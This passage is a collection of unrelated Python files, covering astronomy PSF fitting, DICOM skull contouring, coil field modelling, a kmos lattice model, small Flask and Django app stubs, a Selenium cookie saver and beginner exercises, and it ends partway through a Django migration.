xbinhigh = hmap.GetXaxis().FindBin(deg)
ybinlow = hmap.GetYaxis().FindBin(-deg)
ybinhigh = hmap.GetYaxis().FindBin(deg)
print(xbinlow, xbinhigh, ybinlow, ybinhigh)
xrange = xbinhigh - xbinlow + 1
yrange = ybinhigh - ybinlow + 1
z = np.zeros((xrange, yrange))
for i in range(xrange):
for j in range(yrange):
z[i, j] = hmap.GetBinContent(ybinlow + j, xbinlow + i)
return z
def get_maps(self, deg=0.3):
self.deg = deg
OnMap = "total_1/stereo/skyHistograms/hmap_stereoUC_on"
hmap_UC_on = self.Rfile.Get(OnMap)
OffMap = "total_1/stereo/skyHistograms/hmap_stereoUC_off"
hmap_UC_off = self.Rfile.Get(OffMap)
alphaMap = "total_1/stereo/skyHistograms/hmap_alphaNormUC_off"
hmap_UC_alpha = self.Rfile.Get(alphaMap)
self.On = self.extract_data(hmap_UC_on, deg)
self.Off = self.extract_data(hmap_UC_off, deg)
self.alpha = self.extract_data(hmap_UC_alpha, deg)
self.NormOff = self.Off * self.alpha
return self.On
def fit(self, xpos, ypos, gaus=True):
self.Model = gaus
binsize = 0.05
x = np.arange(-self.deg, self.deg + binsize, binsize)
y = np.arange(-self.deg, self.deg + binsize, binsize)
x_range, y_range = np.meshgrid(x, y)
#Use a constant 2D function to fit the background on Normalized Off map and then freeze this parameter
# when fit the Gauss or King function on On data
bg = models.Const2D('bg')
d_b = Data2D('bg', x_range.flatten(), y_range.flatten(), self.NormOff.flatten(), shape=x_range.shape)
#
# print(bg)
#
f_b = Fit(d_b, bg, CStat(), optmethods.NelderMead())
res_bg = f_b.fit()
bg.c0.freeze()
# print(bg.c0)
if gaus:
source = models.Gauss2D('source')
source.fwhm = 0.08
source.ampl = 100
source.ampl.min = 0
source.ampl.max = 500
# source.fwhm.min = 0
source.fwhm.max = 0.5
source.xpos.min = -self.deg
source.xpos.max = self.deg
source.ypos.min = -self.deg
source.ypos.max = self.deg
source.xpos.val = xpos
source.ypos.val = ypos
OnSourceModel = source + bg
d_s = Data2D('signal', x_range.flatten(), y_range.flatten(), self.On.flatten(), shape=x_range.shape)
f_s = Fit(d_s, OnSourceModel, CStat(), optmethods.NelderMead())
res2 = f_s.fit()
print(res2.format())
f_s.method = optmethods.NelderMead()
f_s.estmethod = Confidence()
err_s = f_s.est_errors()
param = predict(err_s)
# print(param)
print(err_s.format())
self.containmentR, self.containmentRerr = convertFWHMto68(param['fwhm'][0]), convertFWHMto68(
param['fwhm'][1])
self.x, self.y, self.xerr, self.yerr = param['xpos'][0], param['ypos'][0], \
param['xpos'][1], param['ypos'][1]
convert_derotated_RADECJ2000(self.Ra, self.Dec, self.x, self.y, self.xerr, self.yerr)
# print("Source sigma (PSF)")
print("68% Containment radius = {:.3f} +/- {:.3f} degrees".format(self.containmentR, self.containmentRerr))
print("----Containment radius in ArcMinute----\n")
print('68% Containment radius= {:.1f} +/- {:.1f}'.format(self.containmentR * 60, self.containmentRerr * 60))
# print (str(convertFWHMto68(err_s.parvals[0])) + '+/-'+ str(convertFWHMto68(err_s.parmaxes[0])))
else:
beta = md.Beta2D('beta')
beta.r0 = 0.04
beta.alpha = 1.95
beta.xpos.min = -self.deg
beta.xpos.max = self.deg
beta.ypos.min = -self.deg
beta.ypos.max = self.deg
beta.r0.max = 0.3
OnSourceModel = beta + bg
beta.alpha.freeze()
d_s = Data2D('signal', x_range.flatten(), y_range.flatten(), self.On.flatten(), shape=x_range.shape)
f_s = Fit(d_s, OnSourceModel, CStat(), optmethods.NelderMead())
res2 = f_s.fit()
print(res2.format())
f_s.method = optmethods.NelderMead()
f_s.estmethod = Confidence()
err_s = f_s.est_errors()
param = predict(err_s)
print(err_s.format())
self.x, self.y, self.xerr, self.yerr = param['xpos'][0], param['ypos'][0], \
param['xpos'][1], param['ypos'][1]
convert_derotated_RADECJ2000(self.Ra, self.Dec, self.x, self.y, self.xerr, self.yerr)
self.r0 = param['r0'][0]
print("Core radius (r0) = {:.3f} +/- {:.3f}".format(param['r0'][0], param['r0'][1]))
print("Alpha = {:.3f} +/- {:.3f}".format(param['alpha'][0], param['alpha'][1]))
Crad = containment_radius(param['r0'][0], param['alpha'][0])
CradH = containment_radius(param['r0'][0] + param['r0'][1], param['alpha'][0] + param['alpha'][1])
# CradL = containment_radius(param['r0'][0] - param['r0'][1], param['alpha'][0] - param['alpha'][1])
Craderr = abs(CradH - Crad)
print("68% Containment radius = {:.3f} +/- {:.3f}".format(Crad, Craderr))
'''
intproj = IntervalProjection()
intproj.calc(f_s, beta.r0)
intproj.plot()
plt.show()
regproj = RegionProjection()
# regproj.prepare(min=[1, 0], max=[5, 0.15], nloop=(21, 21))
regproj.calc(f_s, beta.alpha, beta.r0)
regproj.contour()
plt.show()
'''
# print("Alpha = {:.3f} +/- {:.3f})".format(param['alpha'][0], param['alpha'][1]))
def plot_skymap(self):
plt.imshow(self.On, cmap='rainbow', origin="lower", extent=[-self.deg, self.deg, -self.deg, self.deg])
plt.plot(self.x - self.xerr, self.y, self.x + self.xerr, self.y, linewidth=2)
plt.colorbar()
plt.xlabel("X position on Sky")
plt.ylabel("Y position on Sky")
axes = plt.gca()
line1 = matplotlib.lines.Line2D((self.x - self.xerr, self.x + self.xerr), (self.y, self.y), color='black')
line2 = matplotlib.lines.Line2D((self.x, self.x), (self.y - self.yerr, self.y + self.yerr), color='black')
axes.add_line(line1)
axes.add_line(line2)
if self.Model:
circle = patches.Circle((self.x, self.y), self.containmentR, color='black', fill=False)
else:
circle = patches.Circle((self.x, self.y), self.r0, color='black', fill=False)
axes.add_patch(circle)
plt.show()
|
12,443 | 2cf99803cc59f1dd38f8f43d7e72cf8620fc5e0b | #
# The rules to travel: You can go one row down, and/or one colum right.
#
def gridTraveler(m, n, memo):
key = f"{m},{n}"
if key in memo: return memo[key]
if m == 0 or n == 0: return 0
if m == 1 and n == 1: return 1
memo[key] = (gridTraveler(m - 1, n, memo) + gridTraveler(m, n - 1, memo))
return(memo[key])
#memo = {}
print(gridTraveler(1, 1, {}))
#memo = {}
print(gridTraveler(2, 3, {}))
#memo = {}
print(gridTraveler(3, 2, {}))
#memo = {}
print(gridTraveler(3, 3, {}))
memo = {}
print(gridTraveler(18, 18, memo)) |
12,444 | ee0e66c124d9ad718a9641e292c6ad8b80576eb9 | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
import numpy as np
from open import load_dicom_folder, dicom_datasets_to_numpy
from icp import icp_wrap
from skimage import measure
from scipy.spatial import distance
import matplotlib.pyplot as plt
from scipy.interpolate import splprep, splev
import copy
from mpl_toolkits.mplot3d import Axes3D
# Mariana Guerra
# Cranial prosthesis modeling
def select_contours(img):
"""
Evaluates all contour found to select only the ones centered near the image center
:param img: 2D ndarray of DICOM image converted by dicom_datasets_to_numpy
:return: list with the wanted contours; list with the central pixel of each wanted contour
"""
# Find contours at a constant value
contours = measure.find_contours(img, 300)
# print("Found " + str(len(contours)) + " contour(s)")
# Select the nearest contours with respect to the center pixel of the image
width = img.shape[1] # number of columms
heigth = img.shape[0] # number of rows
pixel_ref = (width / 2, heigth / 2)
# Threshold distance is 10% of images smallest dimension
dist_thresh = min(width, heigth) * 0.1
contours_wanted = []
pixel_mean_array = []
for contour in contours:
contour_3d = np.zeros([contour.shape[0], 3]) # 3rd dimension added for later conversion to patient coord space
contour_3d[:, :2] = contour
pixel_mean = np.mean(contour, axis=0)
if distance.euclidean(pixel_ref, pixel_mean) <= dist_thresh:
contours_wanted.append(contour_3d)
pixel_mean_array.append(pixel_mean)
# print("Set " + str(len(contours_wanted)) + " contours of interest")
return contours_wanted, pixel_mean_array
def contours_to_patient_coord_sys_and_points_to_skull_axial_axis(datasets, series_arr):
"""
Transforms the contours to patient coordinate system and stores them in contours_list
:param datasets: loaded DICOM images by load_dicom_folder
:param series_arr: 3D ndarray of DICOM image series converted by dicom_datasets_to_numpy
:return: contours_list: list of lists of 3D ndarrays (contours) for every slice, on patient coord system
mean_points_real: 3D ndarray of mean points of healthy skull slices on patient coord system
contours_mean_point_list: list of the mean point of one contour for each slice
"""
mean_points_real = [0, 0, 0] # to storage points on the skull axis line (healthy slices)
contours_list = [None] * series_arr.shape[2] # list of all contours of all slices
contours_mean_point_list = [None] * series_arr.shape[2] # list of all mean points of contours of interest
rotation_info_list = [] # to storage rotation info found by the icp
# Converts all contours for patient coordinate space based on DICOM tag information
for i in range(series_arr.shape[2]):
img = series_arr[:, :, i]
# Collecting image information
img_orient_pat = [float(x) for x in list(datasets[i].ImageOrientationPatient)]
img_position_pat = [float(x) for x in list(datasets[i].ImagePositionPatient)]
pixel_spacing = [float(x) for x in list(datasets[i].PixelSpacing)]
iop1 = np.array(img_orient_pat[0:3])
iop2 = np.array(img_orient_pat[3:6])
# Finding contours
[cw, pma] = select_contours(img)
# Setting which one is the internal / external contour (internal=[0], external=[1]) when needed
if len(pma) == 2:
contour_0_len = len(cw[0])
contour_1_len = len(cw[1])
if contour_0_len >= contour_1_len:
cw[0], cw[1] = cw[1], cw[0]
cw_real = copy.copy(cw)
# Coordinate system conversion for all contours
for contour in cw_real:
for k in range(len(contour)):
contour[k] = img_position_pat \
+ iop1 * pixel_spacing[1] * contour[k][0] \
+ iop2 * pixel_spacing[0] * contour[k][1]
contours_list[i] = cw_real
# Collecting points to skull axial axis and lateral symmetry calculation
if len(pma) == 2: # healthy skull slice has outside and inside contours (pixel_mean_array has 2 points)
# uses the mean point of the external contour (contours are approx. concentric)
pixel_mean_real = img_position_pat \
+ iop1 * pixel_spacing[1] * pma[1][0] \
+ iop2 * pixel_spacing[0] * pma[1][1]
contours_mean_point_list[i] = pixel_mean_real
mean_points_real = np.vstack([mean_points_real, pixel_mean_real])
# Lateral symmetry
# external_contour_mirrored = mirror_contour_point(cw_real[1][:, 0:2], pixel_mean_real[0:2])
# T = icp_wrap(cw_real[1][:, 0:2], external_contour_mirrored, debug=True)
# rotation_info_list.append(T)
return contours_list
def plot_contours(img, contours):
# Display the image and plot all contours in a array of contours
fig, ax = plt.subplots()
contour_img = ax.imshow(img, interpolation='nearest', cmap=plt.cm.gray, origin='bottom')
for contour in contours:
ax.plot(contour[:, 1], contour[:, 0], linewidth=2) # x and y are switched for correct image plot
ax.axis('image')
plt.colorbar(contour_img, ax=ax)
plt.show()
def main():
datasets = load_dicom_folder(r"C:\Users\Escritorio\Dropbox\USP\Projeto Mariana\TestSeries\JLL")
series_arr, _ = dicom_datasets_to_numpy(datasets)
contours_list = \
contours_to_patient_coord_sys_and_points_to_skull_axial_axis(datasets, series_arr)
# Plots all contours from contours_list
fig, ax = plt.subplots()
contour = contours_list[3][0]
ax.plot(contour[:, 0], contour[:, 1], linewidth=1)
tck, u = splprep(contour.T, u=None, s=0.0, per=1)
u_new = np.linspace(u.min(), u.max(), 1000)
x_new, y_new = splev(u_new, tck, der=0)
ax.plot(x_new, y_new, 'b--')
# for j in range(len(contours_list)):
# for contour in contours_list[j]:
# ax.plot(contour[:, 0], contour[:, 1], contour[:, 2], linewidth=1)
# ax.set_xlim3d(-200, 200)
# ax.set_ylim3d(-50, 50)
# ax.set_zlim3d(100, 200)
# plt.axis('scaled')
plt.show()
if __name__ == '__main__':
main() |
12,445 | ffb6c37229410ead6b9e91456f3d48c3f12bcc12 | # -*- coding: utf-8 -*-
"""
Created on Fri Apr 8 14:56:45 2016
@author: user
"""
from __future__ import division
from numpy.linalg import solve
import numpy as np
from matplotlib import pyplot as plot
a = 0.12
b = 0.135
g = 1.85
cla = 40
mumax = 0.55
Kp = 4
mu = mumax*(1 + (cla/Kp))**-1
thetha = 0.2
S = np.matrix([[1+a, 1, 0, 0, 0, 0, 0, 0],
[0, -1, 1, 1, 0, 0, 0, 0],
[0, 0, 0, -1, 1, 1, 0, 0],
[0, 0, 0, 0, 0, -1, 1, 1],
[0, 0, 0, 0, 0, -1/3, 1, 0],
[b, 0, -1/3, 1/3, -1/3, 0, 0, -1],
[-g, -1/3, 0, 2/3, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0]])
#
C = np.matrix( [1, 0, 0, 0, 0, 0, 0, 0]).T
Yg = solve(S, C)
Ysatp_g=-1/3*Yg[1]+2/3*Yg[3]
S[6] = [1,0,0,0,0,0,0,0]
Ym = solve(S, C)
Ysatp_m=-1/3*Ym[1]+2/3*Ym[3]
r_la = (Yg[4]/Yg[0])*mu + (Ym[4]/Ysatp_m)*thetha
r_et = (Yg[-1]/Yg[0])*mu + (Ym[-1]/Ysatp_m)*thetha
r_s = (1/Yg[0])*mu + (1/Ysatp_m)*thetha
Yla_o = r_la/r_s
Yet_o = r_et/r_s
print (Yla_o)
print ()
print (Yet_o)
|
12,446 | 2307621cf512695706c4ceada3fa680e3ce385e9 | import sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.ticker as tk
from matplotlib import gridspec
def field_norm(z_pts: np.ndarray, wire_locations: np.ndarray, p: np.ndarray) -> tuple:
"""
z_pts: an array consisting of points along the z-axis (0, 0, z) for magnetic field calculations
wire_locations: an array consisting of the z-position of individual coil windings
p: an array consisting of the radius of wire turns within a single groove
Return the normalized magnetic field and the non-normalized central magnetic field
"""
mu0 = 4*np.pi*10**(-7) # permeability of free space
B_c = np.sum(mu0*p**2/(p**2 + wire_locations**2)**1.5, axis=(1, 2))/2
B_z = np.sum(mu0*p**2/(p**2 + (z_pts - wire_locations)**2)**1.5, axis=(1, 2))/2
return B_z/B_c, float(B_c)
def main(path):
wire_locations = pd.read_csv('{}/wire_locations.csv'.format(path), header=0)
p = np.array(wire_locations.iloc[0, :-2]) # radii of wire turns in a single groove
p_avg = np.average(p) # average radius for comparison with alternative coil designs
loops = len(p)
p = p.reshape((1, 1, loops))
ng_wire_locations = np.array(wire_locations['z'])
windings = len(ng_wire_locations)
ng_wire_locations = ng_wire_locations.reshape((1, len(ng_wire_locations), 1))
end_point = ng_wire_locations[0, -1, 0]
# solenoid with equal length and radius to ng coil
sol_wire_locations = np.linspace(-end_point, end_point, windings)
sol_wire_locations = sol_wire_locations.reshape((1, windings, 1))
# helmholtz coil with equal length to ng coil
helm1_wire_locations = np.array([end_point, -end_point])
helm1_wire_locations = helm1_wire_locations.reshape((1, 2, 1))
# helmholtz coil with equal radius to ng coil
helm2_wire_locations = np.array([p_avg/2, -p_avg/2])
helm2_wire_locations = helm2_wire_locations.reshape((1, 2, 1))
# lee-whiting coil with equal length to ng coil
lw1_outer_wire = np.full(9, end_point)
lw1_inner_wire = np.full(4, 2432*end_point/9408)
lw1_wire_locations = np.concatenate((lw1_outer_wire, lw1_inner_wire, -lw1_inner_wire, -lw1_outer_wire))
lw1_wire_locations = lw1_wire_locations.reshape((1, 26, 1))
# lee-whiting coil with equal radius to ng coil
lw2_outer_wire = np.full(9, 0.9408*p_avg)
lw2_inner_wire = np.full(4, 0.2432*p_avg)
lw2_wire_locations = np.concatenate((lw2_outer_wire, lw2_inner_wire, -lw2_inner_wire, -lw2_outer_wire))
lw2_wire_locations = lw2_wire_locations.reshape((1, 26, 1))
calculation_number = 1000 # number of magnetic field calculation points
z_calc = np.linspace(-end_point, end_point, calculation_number).reshape((calculation_number, 1, 1)) # array of calculation points
field_ng, center_ng = field_norm(z_calc, ng_wire_locations, p)
field_sol, center_sol = field_norm(z_calc, sol_wire_locations, p_avg)
field_helm1, center_helm1 = field_norm(z_calc, helm1_wire_locations, end_point*2)
field_helm2, center_helm2 = field_norm(z_calc, helm2_wire_locations, p_avg)
field_lw1, center_lw1 = field_norm(z_calc, lw1_wire_locations, end_point/0.9408)
field_lw2, center_lw2 = field_norm(z_calc, lw2_wire_locations, p_avg)
print('\n Coil | B(0) (\u03BCT/A*turns) | R (cm) | L (cm)')
print('--------------------------------------------')
print(' NG | {:>9.6f} | {:>6.3f} | {:>6.3f}'.format(np.round(center_ng*10**6/(windings*loops), 6), np.round(100*p_avg, 2), np.round(100*end_point, 2)))
print(' Sol | {:>9.6f} | {:>6.3f} | {:>6.3f}'.format(np.round(center_sol*10**6/windings, 6), np.round(100*p_avg, 2), np.round(100*end_point, 2)))
print(' H 1 | {:>9.6f} | {:>6.3f} | {:>6.3f}'.format(np.round(center_helm1*10**6/2, 6), np.round(200*end_point, 2), np.round(100*end_point, 2)))
print(' H 2 | {:>9.6f} | {:>6.3f} | {:>6.3f}'.format(np.round(center_helm2*10**6/2, 6), np.round(100*p_avg, 2), np.round(50*p_avg, 2)))
print(' LW 1 | {:>9.6f} | {:>6.3f} | {:>6.3f}'.format(np.round(center_lw1*10**6/26, 6), np.round(end_point/0.009408, 2), np.round(100*end_point, 2)))
print(' LW 2 | {:>9.6f} | {:>6.3f} | {:>6.3f}\n'.format(np.round(center_lw2*10**6/26, 6), np.round(100*p_avg, 2), np.round(94.08*p_avg, 2)))
fig = plt.figure(figsize=(6, 12))
gs = gridspec.GridSpec(2, 1, hspace=0.025)
ax = fig.add_subplot(111)
ax2 = fig.add_subplot(gs[0])
ax3 = fig.add_subplot(gs[1])
ax.spines['top'].set_color('none')
ax.spines['bottom'].set_color('none')
ax.spines['left'].set_color('none')
ax.spines['right'].set_color('none')
ax.tick_params(labelcolor='w', top=False, bottom=False,
left=False, right=False)
ax.set_ylabel('Normalized Magnetic Field', fontsize=13, labelpad=13)
ax2.plot(100*z_calc[:, 0, 0], field_ng, label='NG')
ax2.plot(100*z_calc[:, 0, 0], field_sol, label='Sol', ls='--')
ax2.plot(100*z_calc[:, 0, 0], field_lw1, label='LW #1', ls=':')
ax2.plot(100*z_calc[:, 0, 0], field_helm1, label='Helm #1', ls='-.')
ax2.tick_params(labelsize=13, top=True, right=True,
direction='in', which='both')
ax2.xaxis.set_major_formatter(tk.NullFormatter())
ax2.legend(loc=8, fontsize=13, handlelength=1)
ax3.plot(100*z_calc[:, 0, 0], field_ng, label='NG')
ax3.plot(100*z_calc[:, 0, 0], field_sol, label='Sol', ls='--')
ax3.plot(100*z_calc[:, 0, 0], field_lw2, label='LW #2', ls=':')
ax3.plot(100*z_calc[:, 0, 0], field_helm2, label='Helm #2', ls='-.')
ax3.set_xlabel('z-position (cm)', fontsize=13)
ax3.tick_params(labelsize=13, top=True, right=True,
direction='in', which='both')
ax3.legend(loc=8, fontsize=13, handlelength=1)
plt.savefig('{}/field_profile.eps'.format(path), bbox_inches='tight')
plt.close()
plt.figure(figsize=(6, 2))
plt.vlines(100*ng_wire_locations, 0, 1, color='C0')
plt.xlabel('Wire Positions (cm)', fontsize=13)
plt.yticks([], [])
plt.tick_params(labelsize=13, top=True, direction='in', which='both')
plt.savefig('{}/wire_locations.eps'.format(path), bbox_inches='tight')
plt.close()
if __name__ == '__main__':
main(sys.argv[1])
|
12,447 | 30444f1a4133c17d010dbb9ea1aacf0bbac05438 | # 通过用户输入数字计算阶乘
# 获取用户输入的数字
import time
start = time.time()
# num = int(input("请输入一个数字: "))
num = 10000
factorial = 1
# 查看数字是负数,0 或 正数
if num < 0:
print("抱歉,负数没有阶乘")
elif num == 0:
print("0 的阶乘为 1")
else:
for i in range(1,num + 1):
factorial = factorial*i
print("%d 的阶乘为 %d" %(num,factorial))
end = time.time()
print('开始毫秒数:', start)
print('结束毫秒数:', end)
print('运行时间:', end - start) |
12,448 | d3dddae3eb2349fc039a717d3fa2305c43b5630a | '''tempo=int(input('Quantos anos seu carro tem? '))
if tempo<=3:
print('Carro novo')
else:
print ('Carro velho')
print ('Carro novo' if tempo<=3 else 'Carro velho')'''
'''nome=str(input('Qual seu nome? '))
if nome=='Thiago':
print('Que nome lindo você tem!')
else:
print('Queria que fosse Thiago XD')
print('Bom dia, {} ' .format(nome))'''
n1=(float(input('Digite a primeira nota ')))
n2=(float(input('Digite a segunda nota ')))
media=(n1+n2)/2
print('Sua média foi {} ' .format(media))
if media >=6.0:
print('Aprovado')
else:
print('Reprovado, filho da puta! Se fudeu!') |
12,449 | 40ef49b2c145dad7626c000a6822ff62bb25f406 | from flask import Flask
from flask import render_template
from flask import redirect
from flask import request
from flask_wtf.csrf import CSRFProtect
from flask_wtf.csrf import CSRFError
import os
app=Flask(__name__)
@app.route('/login', methods=['GET', 'POST'])
def login():
return render_template('login.html')
@app.route('/validar_login', methods=['POST'])
def validarLogin():
if (request.method == 'POST'):
return redirect('/')
else:
return "ERROR"
@app.route('/recuperar_clave', methods=['GET', 'POST'])
def recuperarClave():
return render_template('recuperarClave.html')
@app.route('/registro', methods=['GET', 'POST'])
def registro():
return render_template('registro.html')
@app.route('/privacidad', methods=['GET'])
def privacidad():
return render_template('privacidad.html')
@app.route('/', methods=['GET'])
def index():
return render_template('index.html')
@app.route('/perfil', methods=['GET'])
def perfil():
return render_template('perfil.html')
@app.route('/agregar_usuario', methods=['GET', 'POST'])
def agregarUsuario():
return render_template('agregarUsuario.html')
@app.route('/validar_agregar_usuario', methods=['POST'])
def validarAgregarUsduario():
return redirect('/perfil')
@app.route('/editar_usuario', methods=['GET', 'POST'])
def editarUsuario():
return render_template('editarUsuario.html')
@app.route('/cambiar_clave', methods=['GET', 'POST'])
def cambiarClave():
return render_template('cambiarClave.html')
@app.route('/vuelos_asignados', methods=['GET'])
def vuelosAsignados():
return render_template('vuelosAsignados.html')
@app.route('/vuelos', methods=['GET'])
def vuelos():
return render_template('vuelos.html')
@app.route('/crear_vuelo', methods=['GET', 'POST'])
def crearVuelo():
return render_template('crearVuelo.html')
@app.route('/editar_vuelo', methods=['GET', 'POST'])
def editarVuelo():
return render_template('editarVuelo.html')
@app.route('/eliminar_vuelo', methods=['GET', 'POST'])
def eliminarVuelo():
return render_template('eliminarVuelo.html')
@app.route('/reservar_vuelo', methods=['GET', 'POST'])
def reservarVuelo():
return render_template('reservarVuelo.html')
@app.route('/buscar_vuelo', methods=['GET'])
def buscarVuelo():
return render_template('buscarVuelo.html')
@app.route('/calificar_vuelo', methods=['GET', 'POST'])
def calificarVuelo():
return render_template('calificarVuelo.html')
@app.route('/gestion_comentario', methods=['GET', 'POST'])
def gestionComentario():
return render_template('gestionComentario.html')
@app.route('/dashboard', methods=['GET'])
def dashboard():
return render_template('dashboard.html')
@app.route('/dashboard_vuelos', methods=['GET'])
def dashboardVuelos():
return render_template('dashboardVuelos.html')
@app.route('/dashboard_usuarios', methods=['GET'])
def dashboardUsuarios():
return render_template('dashboardUsuarios.html')
@app.route('/dashboard_calificaciones', methods=['GET'])
def dashboardCalificaciones():
return render_template('dashboardCalificaciones.html')
@app.errorhandler(CSRFError)
def handle_csrf_error(e):
return render_template('csrfError.html', reason=e.description), 400
csrf = CSRFProtect()
csrf.init_app(app)
SECRET_KEY = os.urandom(32)
app.config['SECRET_KEY'] = SECRET_KEY
app.run(debug=True)
|
12,450 | ec6d6cd27363cec2beeb0af6edd7f77cf636721b | # 霍夫变换
import cv2
import numpy as np
def drawFindLines(img, lines):
for i in lines:
for rho, theta in i:
a = np.cos(theta)
b = np.sin(theta)
# 变换到x-y坐标系
x0 = a * rho
y0 = b * rho
# 用点和斜率得到直线上的两个点
x1 = int(x0 + 1000 * (-b))
y1 = int(y0 + 1000 * (a))
x2 = int(x0 - 1000 * (-b))
y2 = int(y0 - 1000 * (a))
cv2.line(img, (x1, y1), (x2, y2), (0, 0, 255), 1)
img = cv2.imread('../Datasets/rand.jpg')
grayImg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# 边缘检测
edges = cv2.Canny(grayImg, 50, 120, apertureSize=3)
cv2.imshow('cannyImg', edges)
# 三维的直线集合.第一维为直线条数,第二维和第三维为对应的rho和theta
lines = cv2.HoughLines(edges, 1, np.pi/180, 250)
drawFindLines(img, lines)
cv2.imshow('Line', img)
cv2.waitKey(0)
cv2.destroyAllWindows() |
12,451 | 1f18d6083a8f94399e50b1786ed098d8060c0f71 | from itertools import product
from kmos.cli import main as cli_main
from kmos.types import Action, Condition, Layer, Project, Site, Species
# Project
pt = Project()
pt.set_meta(
author='Michael Seibt',
email='michael.seibt@tum.de',
model_name='LGD_lateral',
model_dimension=2
)
# Species
pt.add_species(
Species(name='empty', color='#d3d3d3'),
Species(name='ion', color='#0000ff', representation="Atoms('Si')"),
Species(name='source', color='#00ff00', representation="Atoms('Au')"),
Species(name='drain', color='#ff0000', representation="Atoms('Ag')")
)
pt.species_list.default_species = 'empty'
# Layer and Coordinates
layer = Layer(name='simple_cubic')
layer.add_site(Site(name='hollow', pos='0.5 0.5 0.5'))
pt.add_layer(layer)
center = pt.lattice.generate_coord('hollow')
bottom = pt.lattice.generate_coord('hollow.(0,-1,0)')
top = pt.lattice.generate_coord('hollow.(0,+1,0)')
left = pt.lattice.generate_coord('hollow.(-1,0,0)')
right = pt.lattice.generate_coord('hollow.(+1,0,0)')
# Parameters
pt.add_parameter(name='E0', value=0.5)
pt.add_parameter(name='T', value=300)
pt.add_parameter(name='eps_f', value=0.0, adjustable=True, min=-0.05, max=0.05)
pt.add_parameter(name='e_int', value=0.002, adjustable=True, min=0.00, max=0.01)
pt.add_parameter(name='thetaS', value=1.0, adjustable=True, min=0.0, max=1.0)
pt.add_parameter(name='thetaD', value=0.0, adjustable=True, min=0.0, max=1.0)
# Processes
names = ['top', 'left', 'bottom', 'right']
delta_Es = ['E0', 'E0+eps_f', 'E0', 'E0-eps_f']
coordinates = [top, left, bottom, right]
for coordinate_name, delta_E, coordinate in zip(names, delta_Es, coordinates):
for i, conf in enumerate(product(['empty', 'ion'], repeat=3)):
diffusion_condition = [
Condition(species='ion', coord=center),
Condition(species='empty', coord=coordinate)
]
diffusion_action = [
Condition(species='ion', coord=coordinate),
Condition(species='empty', coord=center)
]
temp_coords = coordinates[:]
temp_coords.remove(coordinate)
for conf_species, temp_coord in zip(conf, temp_coords):
diffusion_condition.append(Condition(species=conf_species, coord=temp_coord))
nns = conf.count('ion')
pt.add_process(
name='diffusion_%s_%s' % (coordinate_name, i),
conditions=diffusion_condition,
actions=diffusion_action,
rate_constant='1/(beta*h)*exp(-beta*((%s)-%s*e_int)*eV)' % (delta_E, nns)
)
# if left == empty, make another process where condition is left == source
# important for first step after emission -> otherwise deadlock
if left in temp_coords:
left_index = temp_coords.index(left)
if conf[left_index] == 'empty':
diffusion_condition = [
Condition(species='ion', coord=center),
Condition(species='empty', coord=coordinate)
]
for conf_species, temp_coord in zip(conf, temp_coords):
if temp_coord == left:
conf_species = 'source'
diffusion_condition.append(Condition(species=conf_species, coord=temp_coord))
pt.add_process(
name='diffusion_%s_%s_source' % (coordinate_name, i),
conditions=diffusion_condition,
actions=diffusion_action,
rate_constant='1/(beta*h)*exp(-beta*((%s)-%s*e_int)*eV)' % (delta_E, nns)
)
source_entry_conditions = [
Condition(species='empty', coord=center),
Condition(species='source', coord=left)
]
source_exit_conditions = [
Condition(species='ion', coord=center),
Condition(species='source', coord=left)
]
pt.add_process(
name='source_entry',
conditions=source_entry_conditions,
actions=source_exit_conditions,
rate_constant='thetaS*1/(beta*h)*exp(-beta*(E0-eps_f)*eV)'
)
pt.add_process(
name='source_exit',
conditions=source_exit_conditions,
actions=source_entry_conditions,
rate_constant='(1-thetaS)*1/(beta*h)*exp(-beta*(E0+eps_f)*eV)'
)
drain_entry_conditions = [
Condition(species='ion', coord=center),
Condition(species='drain', coord=right)
]
drain_exit_conditions = [
Action(species='empty', coord=center),
Action(species='drain', coord=right)
]
pt.add_process(
name='drain_exit',
conditions=drain_entry_conditions,
actions=drain_exit_conditions,
rate_constant='(1-thetaD)*1/(beta*h)*exp(-beta*(E0-eps_f)*eV)',
tof_count={'current': 1}
)
pt.add_process(
name='drain_entry',
conditions=drain_exit_conditions,
actions=drain_entry_conditions,
rate_constant='thetaD*1/(beta*h)*exp(-beta*(E0+eps_f)*eV)',
tof_count={'current': -1}
)
# Build model
file_name = pt.meta.model_name + '.xml'
pt.save(file_name)
if False: # build the exported .xml directly
cli_main('export %s' % file_name)
pt.print_statistics()
|
12,452 | 0b8c1463aa5effa450d7b08711cd16d0a44b5824 | from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import json
chrome_options = Options()
# chrome_options.add_argument('--headless')
# chrome_options.add_argument('--disable-gpu')
driver = webdriver.Chrome(chrome_options=chrome_options)
driver.get("http://www.openedv.com/")
input("get_cookies?")
# 获取cookie并通过json模块将dict转化成str
dictCookies = driver.get_cookies()
jsonCookies = json.dumps(dictCookies)
# 登录完成后,将cookie保存到本地文件
with open('cookies.json', 'w') as f:
f.write(jsonCookies) |
12,453 | 0bfb6a1589509a90f955c3a1a2691cd9bd2715e3 | from django.contrib import admin
from .models import Funcionario
class ListandoFuncionarios(admin.ModelAdmin):
list_display = ('nome', 'user', 'empresa')
admin.site.register(Funcionario, ListandoFuncionarios)
|
12,454 | 3e958900a8a04d13965418defeddd9d938d73998 | import os
while 1:
text = input()
try:
print('basename = ' + os.path.basename(text))
except:
print('unknown basename')
pass
try:
print('dirname = ' + os.path.dirname(text))
except:
print('unknown durname')
pass
try:
print('splitext = ' + str(os.path.splitext(text)))
except:
print('unknown splitext')
pass |
12,455 | c26775426d34ebaa8ec5264d9b4d26263bb931ca | # Generated by Django 3.2.2 on 2021-06-16 19:12
from django.db import migrations, models
import django_fsm
class Migration(migrations.Migration):
dependencies = [
('main', '0007_rename_proxy_container_ip_containerinfo_proxy_container_address'),
]
operations = [
migrations.AlterField(
model_name='curation',
name='_status',
field=django_fsm.FSMField(choices=[('new', 'New'), ('incom_materials', 'Incomplete Materials'), ('major_issues', 'Major Issues'), ('minor_issues', 'Minor Issues'), ('no_issues', 'No Issues')], default='new', help_text='Was the submission approved by the curator', max_length=15, verbose_name='Review'),
),
migrations.AlterField(
model_name='curation',
name='report',
field=models.TextField(default='', verbose_name='Details'),
),
migrations.AlterField(
model_name='edition',
name='_status',
